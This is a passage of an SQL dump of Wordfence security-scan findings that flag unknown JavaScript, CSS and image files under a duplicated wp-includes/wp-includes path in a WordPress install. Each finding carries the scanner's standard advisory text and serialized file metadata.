WordPress core: wp-includes/wp-includes/js/plupload/plupload.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/plupload/plupload.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27341,1631424924,1631424924,'new','knownfile',75,'02424a6375801a6f7ac145e8ba43ddbd','2c75606bbf5802230f0920734fb8bdf4','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/wp-plupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/plupload/wp-plupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27342,1631424924,1631424924,'new','knownfile',75,'5ab59ac7399512c2fbba5f882a133c9b','f076d7b646f620b0117f769d4b250b14','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/wp-plupload.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/plupload/wp-plupload.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27343,1631424924,1631424924,'new','knownfile',75,'bb9cdca2d6a41c9094caf0b0ed5040b0','bef2c34e640e30c79e966c174a966af2','Unknown file in WordPress core: wp-includes/wp-includes/js/quicktags.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/quicktags.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27344,1631424924,1631424924,'new','knownfile',75,'3636e8430ea8e08a5a43a63b925eba8e','cf7eee02e8f8de9779448656eb3618c4','Unknown file in WordPress core: wp-includes/wp-includes/js/quicktags.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/quicktags.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27345,1631424924,1631424924,'new','knownfile',75,'60adf4c534f1116d60b2004b6b18d37d','55c97302912891fac431592059e21d52','Unknown file in WordPress core: wp-includes/wp-includes/js/shortcode.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/shortcode.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27346,1631424924,1631424924,'new','knownfile',75,'e57f92f98a4fdb4b56b141a6ecff9c50','32157b60ebd0696fd63f43b07049f930','Unknown file in WordPress core: wp-includes/wp-includes/js/shortcode.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/shortcode.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27347,1631424924,1631424924,'new','knownfile',75,'646b0ea843bc996cbaccadfc84415670','03e39a78bbcd9b3920357ac8f44ebd29','Unknown file in WordPress core: wp-includes/wp-includes/js/swfobject.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/swfobject.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27348,1631424924,1631424924,'new','knownfile',75,'acba1c2ccc2224760affbbf07859a8ba','a32cb12b027667b44704749165dd41cc','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/handlers.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/swfupload/handlers.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27349,1631424924,1631424924,'new','knownfile',75,'fae70ea06fc7cd8bf6e05cbeea192c29','104282a4d4d6198c9107bdf879f2d366','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/handlers.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/swfupload/handlers.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27350,1631424924,1631424924,'new','knownfile',75,'09f2a09a6c0ce890d5bf1aa708e70270','8f27d80821af0a3fe18ae3aba54a31b9','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/swfupload/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27351,1631424924,1631424924,'new','knownfile',75,'6b77944cd900626fae9515bea626ffc1','0edcfd75421e9e207daa228c7380d529','Unknown file in WordPress core: wp-includes/wp-includes/js/swfupload/swfupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/swfupload/swfupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27352,1631424925,1631424925,'new','knownfile',75,'bf88063d130a83d366b9bdc0528e72a6','30136f95cec3913729f4cc6b0774253e','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/loadingAnimation.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/js/thickbox/loadingAnimation.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27353,1631424925,1631424925,'new','knownfile',75,'55e3a8c813b6cc58b6d833770242e9f8','ef92e75aa80c53eae9080eca495ba086','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/macFFBgHack.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/thickbox/macFFBgHack.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27354,1631424925,1631424925,'new','knownfile',75,'6f53ab874e618b816ee721009bdb53b5','581ec418291fa36f1ba298fb71f782ff','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/thickbox.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/thickbox/thickbox.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27355,1631424925,1631424925,'new','knownfile',75,'b7c965e39138888708fbc4890ec1d968','4a36a912783978cf9e4088d18424146e','Unknown file in WordPress core: wp-includes/wp-includes/js/thickbox/thickbox.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/thickbox/thickbox.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27356,1631424925,1631424925,'new','knownfile',75,'c71e81dce7dcafb493637ccd60260b04','74aef08791c91e12b36eb0c29bc8531e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/tinymce/langs/wp-langs-en.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27357,1631424925,1631424925,'new','knownfile',75,'bfca04010213b07658c0db50a538c4f3','172f90c754b828e4ff450b717e251a47','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/license.txt','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/tinymce/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27358,1631424925,1631424925,'new','knownfile',75,'c9953f51b8caa4a6bd77891a181523b5','6e27fc0d83353e3799f3e8772a06c790','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27359,1631424925,1631424925,'new','knownfile',75,'0261303a9f3241c07641f34d2713fc42','2482398f3bff81105e8bce57da064da2','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27360,1631424925,1631424925,'new','knownfile',75,'91969b8d666abd5bb2ec94224a6bbce8','098b3d4dd33c1a5b577bc9fcc83553ab','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27361,1631424925,1631424925,'new','knownfile',75,'8fd0456e10499b4977cbc405e2b0c843','df44bfe07a78b51a907c3b6e22d501af','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27362,1631424925,1631424925,'new','knownfile',75,'fc102afaec9cc8c7305387d6b05a2823','79300e38e77ad6abcbfd42bb9d516e39','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27363,1631424925,1631424925,'new','knownfile',75,'7ea8db9a1a697d2f78fa629145f48731','3a4f2cba78bc0b2fafa8cceba2476d21','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27364,1631424925,1631424925,'new','knownfile',75,'f74536056c1dfd101be764462a6052ec','ef2e401c835cf5800f5e8567d59c40af','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27365,1631424926,1631424926,'new','knownfile',75,'d170b7a19efaa50ee62fee281b430c41','e6b6054b3d2969126410d18536553043','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27366,1631424926,1631424926,'new','knownfile',75,'facacec8b83635fe55893d60e7c8ed7c','0658a65d6d22b8bb5afc36de67d06592','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/js/tinymce/plugins/directionality/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27367,1631424926,1631424926,'new','knownfile',75,'6ef289cd5a1c5d43a8acf6018ff2975e','c822f5c98a92ac4c3636c9af10fa90e5','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27368,1631424926,1631424926,'new','knownfile',75,'8f76dc17d43e3d3d01142cf69da6da6f','ac94ccdeacb12571b369f3cdfb682d0c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27369,1631424926,1631424926,'new','knownfile',75,'06ac43458945cea8053ca2da2946f1f1','4dfa0439e32091f39824867759bed2ad','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27370,1631424926,1631424926,'new','knownfile',75,'7272a1a1202101ec3237005b722a152e','156c208b562f5c7bdb2a1b0b1e6635b0','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27371,1631424926,1631424926,'new','knownfile',75,'bdff3d30779f73059779cfa82ec6c984','195850c94bdd6d3c5f03d57c3076c2ea','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/image/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27372,1631424926,1631424926,'new','knownfile',75,'6dc054dc2f32d8a9b1447fa6a7b9e767','da29389e9f121175245de32f9776271c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27373,1631424926,1631424926,'new','knownfile',75,'2c933a8d714d0e01d04d95a36765507f','580b3305dd239d2b81aeacff371b7d60','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27374,1631424926,1631424926,'new','knownfile',75,'3bc3b37d93ac53679eedb61d18747e2c','62a92899782cc6fd74d4f00a8f3e79e4','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/link/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27375,1631424926,1631424926,'new','knownfile',75,'53480c1a8b59464c728c310a3d2b63a8','73e6c5c3a5fb0bd9d12d2eea8bc852e8','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27376,1631424926,1631424926,'new','knownfile',75,'e5e700c33b4a26bd92b52edd7deb4bb1','9f550f7bfc58497abd382e86be426e52','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/lists/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27377,1631424926,1631424926,'new','knownfile',75,'b16709942bcd747aeb66d897228f5f94','96a9cebd4deda94dfea6c16bb051ea7f','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/media/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27378,1631424926,1631424926,'new','knownfile',75,'a7f7cfd8681939ba30546a7e87e4790b','dd7c2c8cdf6b577ea51d669b311b49b0','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/media/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27379,1631424927,1631424927,'new','knownfile',75,'066b46ed115e9879b40432f5d5871264','f22eeb040811d90f9ee875a0f02c6941','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by 